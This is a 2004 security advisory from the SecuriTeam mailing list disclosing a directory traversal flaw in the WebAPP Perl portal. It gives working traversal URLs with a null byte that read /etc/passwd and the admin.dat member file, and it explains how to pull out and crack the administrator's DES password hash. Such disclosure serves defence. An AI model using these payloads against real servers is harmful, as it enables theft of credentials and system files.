[UNIX] WebAPP Directory Traversal and Encrypted DES Disclosure
From: SecuriTeam (support_at_securiteam.com)
Date: 08/31/04
- Previous message: SecuriTeam: "[NT] CesarFTP Server Long Command DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 31 Aug 2004 18:52:02 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WebAPP Directory Traversal and Encrypted DES Disclosure
------------------------------------------------------------------------
SUMMARY
<http://www.web-app.org/> WebAPP is "Internet's most feature rich, easy
to run PERL based portal system".
WebAPP suffers from a directory traversal vulnerability in its view
category module, allowing a remote attacker to compromise sensitive files
stored in the server as well as WebAPP administrator's DES encrypted
password.
DETAILS
Exploit:
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
2) Click on Articles on the main menu at the left side of the screen
3) Click on any of the icons representing the miscellaneous topics
available
4) You'll wind up with the URL
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs
on the address bar on your browser. Change it to
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00
5) View the HTML source for the page
A more interesting file to look at would be:
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
View the HTML source code and scroll down until you come to the line with:
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"
"adUCOOzV2ljgg" is the hashed password of the Administrator. It's standard
DES encrypted so you can run a password-cracking program to crack it.
ADDITIONAL INFORMATION
The information has been provided by <mailto:jerome.athias@caramail.com>
JXrXme ATHIAS.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] CesarFTP Server Long Command DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
